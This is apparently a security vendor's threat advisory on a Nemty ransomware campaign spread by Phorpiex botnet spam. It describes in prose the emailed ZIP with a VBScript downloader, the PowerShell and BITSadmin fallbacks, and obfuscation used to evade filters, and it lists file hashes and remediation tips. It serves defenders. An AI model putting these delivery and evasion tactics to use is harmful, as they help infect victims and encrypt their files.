Rewterz Informative Update : Ransomware Impacting Pipeline Operations
February 20, 2020Rewterz Threat Advisory – ICS: B&R Industrial Automation Automation Studio and Automation Runtime
February 21, 2020Rewterz Informative Update : Ransomware Impacting Pipeline Operations
February 20, 2020Rewterz Threat Advisory – ICS: B&R Industrial Automation Automation Studio and Automation Runtime
February 21, 2020Severity
High
Analysis Summary
A new Nemty ransomware campaign showing changes in its distribution methods. The first wave of Nemty activity spread via RDP and quickly moved to using the Phorpiex botnet to spread via SMB hosts with weak credentials. In this new campaign, the Phorpiex botnet continues to be leveraged but this time to send spam emails. These emails have ZIP archives attached and a subject line that is simply a smiley emoji. The subject line is likely to evade keyword detection in spam filters. Inside the ZIP archive is a VBScript file used to download and execute the final payload. CMD is used in combination with both PowerShell and BITSadmin, likely to increase chance of infection if one of the methods is blocked by firewalls or AV. In some cases, garbage code was added to obfuscate the file and evade static detection. The Nemty ransomware is downloaded as an executable from a known Phorphiex server.
Impact
File Encryption
Indicators of Compromise
SHA-256
- bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5
- 0517ae27126f767937976d733064869a1b5296aaf622596af6cd4c4aa2184bd2
- 069390b186ce9a3678441d208a5614340d4b2a0a7bbe2991e3087b72e7480112
- 06cf3e872a886db4ed77639eebe08361f9a81d4908ee643de0135f491f690923
- 06df03c989148bcbee007b66216a4fdcec635491922fd744a32315010ba99d2a
- 07c2632f548015a0e61d14b8f5a9e4e988c1674fcc02a90a87d3d94afe0c8135
- 080cb0ad0d69490097f641311186147e8b16954d23885630a7231f7ff5bd8bda
- 0c0c467b094b13943ea7d2b5f91fb19e81c6b521a7a58c27e571ed33a56d8ccb
- 0da9aa96f41ad1cc117dcff1272521a0b9be55e59635704af897169268ef2db7
- 0f49c5375ac7aac76caf8cb0dfd16b8f422e197162c36a4a4ba1449cd08e5056
- 12294dbc60c9b9935abdbba25da98b0314f82da9252e29229860ee4e346aa6ad
- 1261860de3fd1ea3e59f61572f12c2efa41d460896a46ef8731787724f8845ca
- 150b1e4155894701c4b8919413b73d4eebc1d781c4203f54a0713b552f6961be
- 160402da510e6c751bef39ab6af152ef71d7a25c710a8d88586dc56b5bfe1170
- 170d3ddddc64a9feca1fc5ef77b5c1fd0b86b8fb98a91256070ad7be7cf0e619
- 18b656b27704b9fe418d55f5472bda0b2ffe5ae8eb26b910f4db4029fb8a9f7e
- 25a29351100b75f30ae133a3e035b2852298bbe05b9fd08f73a4a8fda52c439d
- 2f3bed3382382b95c84390b6138f68875ce96273fa5f521bab83d67b8e9ad740
- 758c26dcf2a8963b3fcf3b6ea796aacf08870b9733ac87a608cd1be6b56af421
- b20e0ade92a2e824f66e991db75f9ef8b9260e9acda55d52b0d9e1c0936919f8
- e96ca035fc8a2c2ae2dc2e6c112942469821c6682beab8fa7ece1e25e55497ba
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.